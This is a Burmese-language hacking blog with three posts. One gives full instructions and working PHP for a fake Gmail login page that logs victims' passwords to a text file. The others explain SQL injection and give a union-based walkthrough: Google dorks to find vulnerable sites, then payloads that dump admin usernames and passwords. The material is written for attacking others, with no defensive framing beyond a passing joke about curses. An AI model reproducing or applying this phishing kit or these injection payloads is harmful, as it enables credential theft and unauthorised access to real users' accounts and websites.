December 22, 2013

How to make a Phishnig?

Phishing ဆုိတာဘာလဲ...
Phishing ဆုိတာကေတာ့ gamil(or) facebook အစရွိတဲ့ web page အတုမ်ားျပဳလုပ္ၿပီး.. ကုိယ့္ victim ထံေပးပုိ႕ကာ.. ကုိယ့္victim ထံမွ password ရယူျခင္းျဖစ္ပါတယ္....
တစ္ခ်ိဳ႕ဟက္ကာေတြေျပာတာကေတာ့ ဟက္ကင္းေလ့လာခ်င္ရင္ Phishing ကေနစေလ့လာ လုိ႔လည္းေျပာၾကပါတယ္... ကၽြန္ေတာ္အရင္ကလည္း MHU မွာ Phishing နဲ႔ပတ္သက္တဲ့ က်ဴတုိ တင္ေပးဖူးပါတယ္... အခုေတာ့ MSF Forum မွာ ထပ္မံတင္ေပးလုိက္ပါမယ္....

ပံုမွန္အားျဖင့္ Login form ေတြရဲ႕ html code က ေအာက္ပါအတုိင္းျဖစ္ပါတယ္...

<form action="login.php" method="GET/post">
Username <input type="text" value="username"/> </br>
Password <input type="submit" value="password"/>
</form>

ဆုိၿပီး User login ၀င္ဖုိ႔ User name နဲ႔ password ဆုိၿပီး ေယဘုယ်အားျဖင့္ ႏွစ္ခုရွိပါတယ္..
<form> tag က action= ကေတာ့ user ၀င္လုိက္တဲ့ user name နဲ႔ password မွန္မမွန္ database ထဲမွာသိမ္းထားတဲ့ အခ်က္အလက္ေတြနဲ႔တုိက္စစ္ေပးတဲ့ php code ကုိ link ညႊန္းထားပါ... method ကေတာ့ Phising page လုပ္မယ္ဆုိရင္ post method ပဲသံုးရပါမယ္..
Phishing page မွာလည္းအထက္ပါထုိနည္းေတြကုိအသံုးျပဳထားပါတယ္..
ကုိယ္ဖန္တီးလုိက္တဲ့စာမ်က္ႏွာအတုေတြနဲ႔ ကုိယ့္ victim ထံပုိ႔လုိက္ရင္.. ကုိယ့္ victim က တကယ့္ Gmail,Facebook ထင္ၿပီး ၀င္လုိက္တဲ့အခါ.. action မွာ link ညႊန္းထားတဲ့.. php code က user name & password ကုိ output file တစ္ဖုိင္ထဲမွာ သြားသိမ္းေပးပါ့မယ္..
ဟက္ကာက အဲ့ဒီ output file ကုိသြားဖြင့္ၾကည္႕ၿပီး ကုိယ့္ victim ရဲ႕ email & password ရယူျခင္းပဲျဖစ္ပါတယ္...

Phishing ျပဳလုပ္ဖုိ႔အတြက္.. လုိအပ္တာေတြကေတာ့
0x01: ကုိယ္ျပဳလုပ္ခ်င္တဲ့ webpage ရဲ႕ Source code
0x02: Hosting (or) Shell
0x03: Php code for Redirect password...
0x04: plane notepad file for output username & password

ကၽြန္ေတာ္အခုဒီက်ဴတုိမွာ Gmail စာမ်က္ႏွာအတု (gmail phishing)တစ္ခုဖန္တီးျပပါ့မယ္..
အရင္ဆံုး Gmail source code ရဖုိ႔..

www.gmail.com
ကုိသြားလုိက္ပါ.... ၿပီးရင္ Clt+U ကုိႏွိပ္ၿပီး Source code ေတြကုိေကာ္ပီယူၿပီး.. notepad မွာ paste ခ်ၿပီး.. gmail.html ဆုိတဲ့နာမည္နဲ႔ save လုိက္ပါ...
Gmail source code က <form action="" method=""> အစရွိတာပါတဲ့ စာေၾကာင္းကုိလုိက္ရွာရပါမယ္.. အဲ့ဒီကုတ္ကေတာ့ login ၀င္တဲ့ <form> tag ပါ...
အဲ့ဒီ line ကုိေတြ႔ရင္.. action ေနရာမွာ action="login.php" , method="post" နဲ႔အစားသြင္းလုိက္ပါ...
ၿပီးရင္ ေအာက္က php code ေတြကုိ login.php ဆုိတဲ့နာမည္ နဲ႔ save ၿပီး.. notepad plane file တစ္ခုကုိ log.txt လုိ႔နာမည္ေပးလုိက္ပါ...
Gmail ၀င္လုိက္တဲ့ password ေတြကုိ Redirect လုပ္ဖုိ႔ php code ပါ...

Code:
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

အဲ့ဒီ php code ကုိတစ္ခ်က္ၾကည္႕ရေအာင္..

header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
ဒါကေတာ့ gmail phishing မွာ login ၀င္လုိက္ရင္ Redirct ျပန္လုပ္ဖုိ႔သံုးသြားတဲ့ php code ပါ...

$handle = fopen("log.txt", "a");
ဒီဟာေလးကေတာ့.. user name နဲ႔ password ကုိ Out put ထုတ္ဖုိ႔အတြက္ပါ..
ကုိယ့္က log.txt လုိ႔နာမည္ေပးထားတဲ့အတြက္.. log.txt ဆုိတဲ့ notepad အလြတ္ တစ္ခုဖန္တီးၿပီး.. hosting or shell တစ္ခုခုေပၚအတူတူတင္ေပးထားရပါမယ္..
အဲ့ဒီ log.txt မွာ user name နဲ႔ password ေတြကုိ save ေပးမွာျဖစ္ပါတယ္..
အဲ့ဒီ file 3 file ကုိ hosting or shell ေပၚတင္လုိက္မယ္.. ကၽြန္ေတာ္ကေတာ့ shell ေပၚမွာပဲတင္လုိက္မယ္ဗ်ာ.. hosting ေပၚတင္မယ္ဆုိရင္ေတာ့ databse ေဆာက္ဖုိ႔လုိမယ္ထင္တယ္..ဒါမွ ျပန္၀င္လာတဲ့ username & password ကုိ သိမ္းဖုိ႔ database တစ္ခုလုိမယ္ထင္ပါတယ္..
shell ေပၚမွာ phishing ဆုိတဲ့ Folder တစ္ခုေဆာက္ၿပီး.. အဲ့ဖုိင္သံုးခုကုိတင္လုိက္ပါၿပီ..

Image has been scaled down 17% (900x455). Click this bar to view original image (1080x546). Click image to open in new window.
[Image: IeJiOLf.jpg]


ကၽြန္ေတာ္က public_html/phishing/ အထဲမွာတင္ထားတဲ့အတြက္ လင့္ခ္ျပန္ထုတ္ရင္
http://www.site.com/phishing/ ဆိုၿပီးထုတ္ရမွာပါ..
gmail.html link ကုိထုတ္လုိက္မယ္..ဗ်ာ..
http://www.site.com/phishing/gmail.html

Image has been scaled down 17% (900x455). Click this bar to view original image (1080x546). Click image to open in new window.
[Image: nF4XmGw.jpg]


အဲ့ link ကုိ ကုိယ့္ victim ထံပုိ႔လုိက္ရင္ victim က တကယ့္ gmail အစစ္ထင္ၿပီး email, password နဲ႔၀င္လုိက္ရင္....

http://www.site.com/phishing/log.txt မွာ out put ထုတ္ၿပီး email & password ကုိ ရသြားပါမယ္..

Image has been scaled down 17% (900x455). Click this bar to view original image (1080x546). Click image to open in new window.
[Image: EzNLGk9.jpg]


Credit to w!tch
သတိေတာ့ထားစမ္းၾကပါ။က်ိန္စာေတြဘာေတြတုိက္ခံရတတ္တယ္ေနာ္။

December 21, 2013

What is SQL Injection?

What is SQL Injection?
SQL Injection ဆိုတာ website hacking method တခုပါဘဲ။သူကတျခားနည္းလမ္ေတြထက္ ပိုၿပီးေတာ့ ရနိုင္ေခ် မ်ားပါတယ္။ေအာက္ကပံုကို ၾကည့္ပါ။
Programmer အေတာ္ေတာ္မ်ားမ်ားဟာ ခုခ်ိန္ထိ ဘယ္လိုေျဖရွင္းရမလဲဆိုတာကို မသိၾကေသးပါဘူး။
SQL Injection ဘယ္လိုအလုပ္လုပ္သလဲဆိုေတာ့  Database ထဲကေန Information ေတြကိုရယူျခင္းနဲ႕
Unauthorized Access ကိုရရွိတာပါ။ေအာက္က ပံုကိုၾကည့္ပါ။ ။
SQL Injection ကိုသံုးၿပီး ဘာေတြလုပ္ႏိုင္လဲ?ေအာက္ကပံုမွာေတြ႕နိုင္ပါတယ္။ ။
ဒီေလာက္ဆို သေဘာတရားေလာက္နားလည္မယ္လို႕ထင္ပါတယ္။ေအာက္မွာ SQL Attacks list ပါ။
က်ေနာ္ ျပထားတဲ့ ပံုေတြက CEH ထဲက ပံုေတြပါ။အတတ္နိုင္ဆံုးရွင္းျပထားတာမို႕လို႕ နားမလည္ဘူးဆိုရင္ေတာ့ comment ေပးခဲ့ပါ။ ။

December 20, 2013

Union Based SQL Injection

Union Based SQL Injection

က်ေနာ္သိသေလာက္ေလးေတြ ကို ျပန္ေရးေပးတာဆိုေတာ့ အမွားပါရင္လဲ ၾကိုတင္ေတာင္းပန္ထားပါတယ္ခညာ..

SQL Injection ဆိုတာဘာလဲ လို႕ေမးရင္ေတာ့ ေနာက္တင္ေပးပါ့မယ္။ :D

ပထမဆံုးအေနနဲ႕ က်ေနာ္တို႕ SQL Vul ျဖစ္တဲ့ဆိုက္တခုကို အရင္ဆံုးရွာမယ္။

Google Dork ေတြကိုသံုးၿပီးေတာ့ ရွာနိုင္ပါတယ္။ဥပမာ

inurl:index.php?id=

inurl:category.php?id=

inurl:article.php?id=


ဒီလို မ်ိဳး dork ေတြကိုသံုးၿပီးေတာ့ရွာနိုင္ပါတယ္။

http://www.site.com/index.php?id=12


ဒီလိုမ်ိဳးဆိုက္တခုကိုရၿပီဆိုပါေတာ့။ဒီဆိုက္ဟာ SQL vul ျဖစ္မျဖစ္ကို ' ဒါေလးကိုသံုးၿပီးစစ္ၾကည့္မယ္။

http://www.site.com/index.php?id=12'

ဒီလိုမ်ိဳးျဖစ္သြားမယ္။

Error page တခုက်လာၿပီဆုိရင္ေတာ့ ေပ်ာ္လို႕ရပါတယ္။error မက်ဘူးဆိုရင္ေတာ့ ေနာက္တဆိုက္ရွာေပါ့ :P

ေနာက္တဆင့္ကေတာ့ ေကာ္လံအေရတြက္ ကိုသိေအာင္စစ္ၾကည္႔မယ္။  ။

http://www.site.com/index.php?id=12 order by 1-- ဒီလိုမိ်ဳးအရင္ဆံုးစစ္ၾကည့္မယ္

error မတက္ရပါဘူး။ၿပီးရင္ ေအာက္က query လိုမ်ိဳး တိုးၾကည့္မယ္။

http://www.site.com/index.php?id=12 order by 3-- <no error>

http://www.site.com/index.php?id=12 order by 5-- <no error>

http://www.site.com/index.php?id=12 order by 6-- <error>

ေကာ္လံ ၆ ကိုေရာက္ေတာ့ Error တက္တယ္ဆိုပါေတာ့။ဒါဆို ေကာ္လံ ၅ ခုရွိပါတယ္။error တက္တဲ့ ေကာ္လံ ထဲက ေန ၁ ကို နွုတ္လုိက္ပါ။အဲဒါ ေကာ္လံ အေရအတြက္ပါဘဲ။

Finding a vulnerable column


ေကာ္လံဘယ္နခုရွိလဲ သိၿပီဆိုရင္ေတာ့ ဘယ္ေကာ္လံမွာ vul ျဖစ္လည္းဆိုတာကို စစ္ႀကည့္မယ္။

http://www.site.com/index.php?id=12 union select 1,2,3,4,5-- <show vul column>

ဒီလိုဆိုရင္က်ေနာ္တို႕ သိခ်င္တဲ့ vul column ကိုသိပါၿပီ။ ။ဥပမာ ၂ မွာ vul ျဖစ္တယ္ဆိုပါေတာ့။

Finding MySQL version


http://www.site.com/index.php?id=12 union select 1,@@version,3,4,5-- <show version like 5.0.2.1:dcll>

ဒီ query ကိုသံုးၿပီးေတာ့ version သိပါၿပီ။

Finding Table name

Table name ေတြရွာမယ္ဆိုရင္ ေအာက္က query ေတြနဲ႕ရွာပါ မယ္။

http://www.site.com/index.php?id=12 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Table ေတြက်လာၿပီဆိုရင္ user, admin စတဲ့ table ေတြကိုအရင္ရွာႀကည့္ပါ။မေတြ႕ရင္ ကိုယ္လိုခ်င္တဲ့ information ရွိမယ္ထင္တဲ့ table  ေတြကို ရွာလိုက္ပါ။admin ဆိုတဲ့ table ရွိတယ္ဆိုပါစို႕။

Finding Column name

admin ဆိုတဲ့ table ထဲကေန က်ေနာ္တုိ႕ ေကာ္လံ ေတြကို ႏွဳိက္ထုတ္ မယ္။ ။

http://www.site.com/index.php?id=12 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0xTableHex--
0xTableHex ဆိုတဲ့ေနရာမွာ admin ဆိုတဲ့ table name ကို hex value ေျပာင္းၿပီး အေရွ႕ကေန 0x ေလးခံထားတာပါ။

က်ေနာ္တို႔ ခုေကာ္လံေတြရ ၿပီဆိုပါေတာ့။ေကာ္လံေတြထဲ မွာ username, password ေကာ္လံေတြပါပါမယ္။

Extracting data


http://www.site.com/index.php?id=12 union select 1,group_concat(username,0x3a,password),3,4,5 from admin--
0x3a ဆိုတာ : ေလးနဲ႕ hex value ပါ။username နဲ႕ password ၾကားမွာ ခြဲထားတဲ့ သေဘာပါ။

Data ေတြရၿပီဆိုရင္ေတာ့ ဘာဆက္လုပ္မလဲ?

:P :D ;)